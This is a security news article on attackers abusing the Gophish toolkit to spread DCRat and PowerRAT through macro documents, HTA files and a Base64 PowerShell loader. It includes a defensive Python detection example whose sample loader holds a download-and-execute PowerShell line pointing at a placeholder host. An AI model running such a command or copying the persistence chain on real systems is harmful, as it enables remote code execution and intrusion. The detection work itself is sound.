Attackers Are Abusing Gophish to Spread Remote Access Trojans

2024.10.23

According to The Hacker News, an open source phishing toolkit called Gophish is being abused by attackers to deliver the DarkCrystal RAT (also known as DCRat) and PowerRAT remote access Trojans to Russian users.

Gophish lets organizations test their phishing defenses by launching simulated email campaigns from simple templates and tracking who opens and clicks. Here, attackers instead used it to craft phishing emails disguised as Yandex Disk links ("disk-yandex[.]ru") and HTML pages disguised as VK, the most widely used social network in Russia.

The attackers have been observed pushing either malicious Microsoft Word documents or HTML files with embedded JavaScript; which payload is delivered, PowerRAT or DCRat, depends on the initial access vector. When the victim opens the maldoc and enables macros, a malicious Visual Basic for Applications (VBA) macro runs and extracts an HTML application (HTA) file ("UserCache.ini.hta") and a PowerShell loader ("UserCache.ini"). The macro also sets a Windows registry key so that the HTA file is launched automatically every time the user logs in to the device.

The HTA drops a JavaScript file ("UserCacheHelper.lnk.js") that is responsible for executing the PowerShell loader. The JavaScript is run with "cscript.exe", a legitimate Windows script host.

According to researchers, the PowerShell loader script, disguised as an INI file, carries PowerRAT as a Base64-encoded data blob that is decoded and executed in memory on the victim's machine.
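The chain described above leaves three artifacts a defender can hunt for: a Run-key value pointing at an .hta file, cscript.exe launching a double-extension .js script from a user-writable directory, and an "INI" file that is really a PowerShell loader with a long Base64 blob. The following Python is an added example written for this summary, not code from the researchers, from The Hacker News or from the Gophish project. The event records and the loader text are constructed for illustration (loosely modelled on Sysmon process-creation and registry-set events), and every file path and registry path in them is an assumption, not an indicator from the campaign.

```python
import base64
import re

# Constructed sample telemetry for this example (not real logs). Field names loosely follow
# Sysmon: id 13 = registry value set, id 1 = process creation. Paths are assumptions.
SAMPLE_EVENTS = [
    {"id": 13,
     "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\UserCache",
     "details": r"C:\Users\u\AppData\Roaming\UserCache.ini.hta"},
    {"id": 1, "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r'cscript.exe //E:jscript "C:\Users\u\AppData\Roaming\UserCacheHelper.lnk.js"'},
    {"id": 1, "image": r"C:\Windows\System32\cscript.exe",          # benign admin script
     "cmdline": r'cscript.exe "C:\Scripts\backup.vbs"'},
    {"id": 13,                                                       # benign Run key
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "details": r"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
]

RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
HTA_RE = re.compile(r"\.hta\b", re.I)
SCRIPT_HOST_RE = re.compile(r"(?:^|\\)[wc]script\.exe$", re.I)
DOUBLE_EXT_JS_RE = re.compile(r"\.[a-z0-9]{2,4}\.js\b", re.I)   # e.g. "something.lnk.js"
USER_WRITABLE_RE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.I)


def check_registry_event(ev):
    """Flag a Run/RunOnce value whose data references an HTA file (logon persistence)."""
    if RUN_KEY_RE.search(ev["target"]) and HTA_RE.search(ev["details"]):
        return "Run-key persistence pointing at an HTA file"
    return None


def check_process_event(ev):
    """Flag cscript/wscript launching a double-extension .js or a script under AppData."""
    if not SCRIPT_HOST_RE.search(ev["image"]):
        return None
    reasons = []
    if DOUBLE_EXT_JS_RE.search(ev["cmdline"]):
        reasons.append("double-extension .js script")
    if USER_WRITABLE_RE.search(ev["cmdline"]):
        reasons.append("script under user AppData")
    return "; ".join(reasons) or None


def triage(events):
    """Return (event id, reason) for every event that matches one of the checks."""
    findings = []
    for ev in events:
        reason = None
        if ev["id"] == 13:
            reason = check_registry_event(ev)
        elif ev["id"] == 1:
            reason = check_process_event(ev)
        if reason:
            findings.append((ev["id"], reason))
    return findings


# A loader hiding a Base64 blob inside what claims to be an INI file. The inner script is
# constructed for this example; the URL is a reserved .invalid name and resolves nowhere.
INNER_SCRIPT = ("$c = New-Object System.Net.WebClient; "
                "Invoke-Expression $c.DownloadString('http://example.invalid/x')")
SAMPLE_LOADER = ("[settings]\nname=UserCache\n"
                 "$p = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
                 + base64.b64encode(INNER_SCRIPT.encode()).decode() + "'))\n"
                 "Invoke-Expression $p\n")

B64_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
PS_MARKERS = ("Invoke-Expression", "IEX", "System.Net", "FromBase64String",
              "New-Object", "DownloadString")


def extract_loader_payloads(text):
    """Decode every long Base64 run in text and keep the ones that decode to PowerShell.

    Tries UTF-8 first, then UTF-16LE (the encoding PowerShell's -EncodedCommand uses),
    so a blob of either kind is recovered. Runs that are not valid Base64 are skipped.
    """
    found = []
    for m in B64_RE.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:            # bad length or characters: not a real blob
            continue
        for enc in ("utf-8", "utf-16-le"):
            try:
                decoded = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if any(tok in decoded for tok in PS_MARKERS):
                found.append(decoded)
                break
    return found


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print("event", finding[0], "->", finding[1])
    for script in extract_loader_payloads(SAMPLE_LOADER):
        print("embedded PowerShell:", script)
```

The two benign records are there on purpose: a Run key is only suspicious here when its data names an .hta, and cscript.exe is only interesting when the script has a double extension or lives under a user profile, so the checks should stay quiet on routine administration.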

In addition to performing system reconnaissance, the malware collects drive serial numbers and connects to a remote server located in Russia to receive further instructions. If no response is received from the server, PowerRAT can fall back to decoding and executing embedded PowerShell scripts. None of the samples analyzed so far actually carries such embedded Base64-encoded scripts, which suggests the malware is still under active development.

Similarly, the alternative infection chain, which uses an HTML file with embedded malicious JavaScript, triggers a multi-step process that ends with the deployment of DCRat.

DCRat is modular malware that can steal sensitive data, capture screenshots and keystrokes, give the operator remote control of infected systems, and download and execute additional files.

Beyond Russia, related activity has also been detected in nearby Ukraine, Belarus, Kazakhstan, Uzbekistan and Azerbaijan, indicating that users across the Russian-speaking region are being targeted.